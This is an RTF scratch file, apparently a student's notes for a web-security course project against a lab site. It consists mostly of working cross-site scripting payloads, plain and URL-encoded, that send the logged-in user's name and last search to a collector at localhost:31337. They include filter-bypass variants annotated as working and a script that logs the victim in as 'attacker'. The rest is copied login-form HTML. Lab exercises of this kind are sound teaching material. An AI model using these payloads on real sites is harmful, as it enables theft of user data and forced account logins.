{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 Verdana;\f1\fnil\fcharset0 Menlo-Regular;\f2\fnil\fcharset0 HelveticaNeue-Medium;
\f3\fmodern\fcharset0 Courier;\f4\froman\fcharset0 Times-Roman;}
{\colortbl;\red255\green255\blue255;\red251\green0\blue7;\red255\green255\blue255;\red0\green0\blue0;
\red251\green0\blue7;\red38\green38\blue38;\red0\green0\blue0;\red109\green109\blue109;\red38\green38\blue38;
\red194\green194\blue194;\red38\green38\blue38;\red38\green38\blue38;}
{\*\expandedcolortbl;;\cssrgb\c99881\c0\c0;\cssrgb\c100000\c100000\c100000\c0;\cssrgb\c0\c0\c0;
\cssrgb\c99821\c0\c0;\cssrgb\c20022\c20022\c19997;\csgray\c0;\cssrgb\c50196\c50196\c50196;\cssrgb\c20044\c20044\c19994;
\cssrgb\c80392\c80392\c80392;\cssrgb\c20022\c20022\c19997;\cssrgb\c20044\c20044\c19994;}
\margl1440\margr1440\vieww22420\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\sl520\sa200\partightenfactor0

\f0\fs24 \cf2 \cb3 \expnd0\expndtw0\kerning0
<script>document.location="http://localhost:31337/?stolen_user=" + document.getElementById("logged-in-user").innerHTML + "&last_search=" + 
\f1\fs22 \cf4 \kerning1\expnd0\expndtw0 \CocoaLigature0 $(function()\{document.querySelectorAll('div.well div.list-group a')[1].innerText\})[0]
\f0\fs24 \cf2 \expnd0\expndtw0\kerning0
\CocoaLigature1 </script>\
\
\
<script>document.location="http://localhost:31337/?stolen_user=" + document.getElementById("logged-in-user").innerHTML + "&last_search=" + setTimeout(function()\{ alert(document.querySelectorAll('div.well div.list-group a')[1]); \}, 3000);\cf5 </script>
\f2\fs48 \cf6 \
\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\pardeftab720\pardirnatural\partightenfactor0

\f1\fs22 \cf7 \cb1 \kerning1\expnd0\expndtw0 \CocoaLigature0 \
\
\
<script>document.location="http://localhost:31337/?stolen_user=" + document.getElementById("logged-in-user").innerHTML + "&last_search=" + document.referrer </script>\
\
\
\
document.querySelectorAll('div.well div.list-group a')[1].innerText\
\
\
\
\pard\pardeftab720\partightenfactor0

\f3\fs24 \cf4 \expnd0\expndtw0\kerning0
\CocoaLigature1 https://project2.ecen4133.org/search?q=%3Cscript%3Edocument.location=%22http://localhost:31337/?stolen_user=%22%20%2B%20document.getElementById(%22logged-in-user%22).innerHTML%2b%22%26last_search="%2b 
\f0 \cf2 \cb3  
\f1\fs22 \cf4 \kerning1\expnd0\expndtw0 \CocoaLigature0 $(document.querySelectorAll('div.well div.list-group a')[1]).get(0)
\f3\fs24 \cb1 \expnd0\expndtw0\kerning0
\CocoaLigature1  %3C/script%3E\
\
\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\pardeftab720\pardirnatural\partightenfactor0

\f1\fs22 \cf7 \kerning1\expnd0\expndtw0 \CocoaLigature0 \
\pard\pardeftab720\partightenfactor0

\f3\fs24 \cf4 \expnd0\expndtw0\kerning0
\CocoaLigature1 https://project2.ecen4133.org/search?q=%3Cscript%3E
\f0 \cf2 \cb3 setTimeout(function()\{ 
\f3 \cf4 \cb1 document.location=%22http://localhost:31337/?stolen_user=%22%20%2B%20document.getElementById(%22logged-in-user%22).innerHTML%2b%22%26last_search="%2b 
\f0 \cf2 \cb3 document.querySelectorAll('div.well div.list-group a')[1].textContent
\f3 \cf4 \cb1  
\f0 \cf2 \cb3  \}, 1); 
\f3 \cf4 \cb1 %3C/script%3E\
\
\
\pard\pardeftab720\sl520\sa200\partightenfactor0

\f0 \cf2 \cb3 <script>setTimeout(function()\{  document.location="http://localhost:31337/?stolen_user=" + document.getElementById("logged-in-user").innerHTML + "&last_search=" + document.querySelectorAll('div.well div.list-group a')[1].textContent \}, 1);</script>\cf5 \
```\
https://project2.ecen4133.org/search?q=%3Cscript%3EsetTimeout%28function%28%29%7B++document.location%3D%22http%3A%2F%2Flocalhost%3A31337%2F%3Fstolen_user%3D%22+%2B+document.getElementById%28%22logged-in-user%22%29.innerHTML+%2B+%22%26last_search%3D%22+%2B+document.querySelectorAll%28%27div.well+div.list-group+a%27%29%5B1%5D.textContent+%7D%2C+1%29%3B%3C%2Fscript%3E\
\pard\pardeftab720\sl520\sa200\partightenfactor0

\f3 \cf4 \cb1 (works0^)\
\
\pard\pardeftab720\sl520\sa200\partightenfactor0

\f0 \cf5 \cb3 https://project2.ecen4133.org/search?q=%3Cscriscriptpt%3EsetTimeout%28function%28%29%7B++document.location%3D%22http%3A%2F%2Flocalhost%3A31337%2F%3Fstolen_user%3D%22+%2B+document.getElementById%28%22logged-in-user%22%29.innerHTML+%2B+%22%26last_search%3D%22+%2B+document.querySelectorAll%28%27div.well+div.list-group+a%27%29%5B1%5D.textContent+%7D%2C+1%29%3B%3C%2Fscriscriptpt%3E\
\pard\pardeftab720\partightenfactor0

\f3 \cf4 \cb1 (Works1&2^)\
\
\
\
\pard\pardeftab720\sl520\sa200\partightenfactor0

\f0 \cf5 \cb3 https://project2.ecen4133.org/search?q=%3Cscript%3EsetTimeout%28function%28%29%7B++document.location%3D%60http%3A%2F%2Flocalhost%3A31337%2F%3Fstolen_user%3D%60+%2B+document.getElementById%28%60logged-in-user%60%29.innerHTML+%2B+%60%26last_search%3D%60+%2B+document.querySelectorAll%28%60div.well+div.list-group+a%60%29%5B1%5D.textContent+%7D%2C+1%29%3C%2Fscript%3E
\f3 \cf4 \cb1 \
\pard\pardeftab720\partightenfactor0
\cf4 \
\
https://project2.ecen4133.org/search?q=%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E       (zoom)\
\
\
\
\pard\pardeftab720\sl520\sa200\partightenfactor0

\f0 \cf5 \cb3 https://project2.ecen4133.org/login?q=
\f4 \cf4 \cb1 \outl0\strokewidth0 \strokec4 attacker&l33th4x\
<input id="username" name="username" type="text" placeholder="Username" required class="form-control">\
<input id="userpass" name="password" type="password" placeholder="Password" required class="form-control">\
\

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clmrg \clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0

\f3\fs26 \cf4 \cb3 <form action="./login" method="post" class="form-inline">\cell 
\pard\intbl\itap1\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <p>Log in or create an account.</p>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <div class="form-group form-space">\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\sl520\sa200\partightenfactor0

\f4\fs24 \cf4 \cb1 \outl0\strokewidth0 <input id="username" name="username" type="text" placeholder="Username" required class="form-control"> 
\f3\fs26 \cb3 \outl0\strokewidth0 \cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </div>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <div class="form-group form-space">\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\sl520\sa200\partightenfactor0

\f4\fs24 \cf4 \cb1 \outl0\strokewidth0 <input id="userpass" name="password" type="password" placeholder="Password" required class="form-control"> 
\f3\fs26 \cb3 \outl0\strokewidth0 \cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </div>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <div class="form-group form-more-space">\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <button id="log-in-btn" type="submit" formaction="./login" class="btn btn-default">Login</button>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <button id="new-account-btn" type="submit" formaction="./create" class="btn btn-default">Create Account</button>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </div>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </form>\cell \lastrow\row
\pard\pardeftab720\sl520\sa200\partightenfactor0
\cf4 \outl0\strokewidth0 							\cf9 \outl0\strokewidth0 \strokec9 <script>\
\pard\pardeftab720\sl360\partightenfactor0
\cf6 \outl0\strokewidth0 document.getElementsByTagName('input')["userpass"].value = '
\f4\fs24 \cf4 \cb1 \outl0\strokewidth0 \strokec4 l33th4x
\f3\fs26 \cf6 \cb3 \outl0\strokewidth0 '\
document.getElementsByTagName('input')["username"].value = '
\f4\fs24 \cf4 \cb1 \outl0\strokewidth0 \strokec4 attacker
\f3\fs26 \cf6 \cb3 \outl0\strokewidth0 '\cf9 \outl0\strokewidth0 \strokec9 \
\pard\pardeftab720\sl360\partightenfactor0
\cf9 \strokec9     document.forms[
\f1\fs22 \cf10 \cb1 \strokec10 1
\f3\fs26 \cf9 \cb3 \strokec9 ].submit();\
</script>\
\cf11 \strokec11 \
document.getElementsByTagName('input')["userpass"].value = 'password'\
document.getElementsByTagName('input')["username"].value = 'testa'\
\
\
\
``````\
\pard\pardeftab720\sl520\sa200\partightenfactor0

\f4\fs24 \cf4 \cb1 \outl0\strokewidth0 \

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clmgf \clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clmrg \clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0

\f3\fs26 \cf4 \cb3 <form action="./login" method="post" class="form-inline">\cell 
\pard\intbl\itap1\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <p>Log in or create an account.</p>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <div class="form-group form-space">\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\sl520\sa200\partightenfactor0

\f4\fs24 \cf4 \cb1 <input id="username" name="username" type="text" placeholder="Username" value =\'93testa\'94 /> 
\f3\fs26 \cb3 \cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </div>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <div class="form-group form-space">\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\sl520\sa200\partightenfactor0

\f4\fs24 \cf4 \cb1 <input id="userpass" name="password" type="password" placeholder="Password" value=\'93password\'94 /> 
\f3\fs26 \cb3 \cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 </div>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <div class="form-group form-more-space">\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <button id="log-in-btn" type="submit" formaction="./login" class="btn btn-default">Login</button>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 \cell 
\pard\intbl\itap1\pardeftab720\partightenfactor0
\cf4 <button id="new-account-btn" type="submit" formaction="./create" class="btn btn-default">Create Account</button>\cell \row

\itap1\trowd \taflags0 \trgaph108\trleft-108 \trbrdrl\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth5420\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx4320
\clvertalc \clshdrawnil \clwWidth10100\clftsWidth3 \clmart10 \clmarl10 \clmarb10 \clmarr10 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt20 \clpadl20 \clpadb20 \clpadr20 \gaph\cellx8640
